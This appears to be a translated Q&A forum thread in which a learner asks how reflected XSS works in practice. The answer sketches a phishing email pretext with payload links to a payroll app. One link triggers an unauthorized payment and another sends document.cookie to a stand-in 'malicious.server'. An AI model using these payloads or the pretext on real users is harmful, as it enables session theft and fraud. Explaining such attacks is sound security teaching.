有人可以给我反射XSS的真实情况吗?

时间:2018-12-06 10:12:20

标签: xss

我正在研究XSS,并试图了解不同类型的XSS。 大多数文档都在谈论它们的含义,并尝试通过一个简单的示例进行解释。我已经非常了解存储的XSS。

我不了解的是XSS及其在实际情况下的完成情况。大多数解释只是谈论注入恶意代码,该代码通过单击恶意链接被嵌入到用户访问的页面中,但是我不知道。首先了解他们如何以及为什么会单击这样的链接。

如果你们中的任何一个可以分享有关反射XSS的真实示例,那真的很有帮助。

1 个答案:

答案 0 :(得分:0)

“嗨Midhun lc,

我创建了您要的工资报告,在[这里]找到。

关于, 您的助手”

[这里]是指向https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script>的链接(显然,这也利用CSRF。)

或[这里]是指向https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script>的链接,用于窃取会话和其他cookie。 (这也利用了弱cookie标志。)

或者它可以只发送工资单应用程序中受害者可以访问的任何数据。

以此类推。当然,有效载荷到达受害者的方式可能有所不同。它可以在内部文档中,通过电子邮件发送等。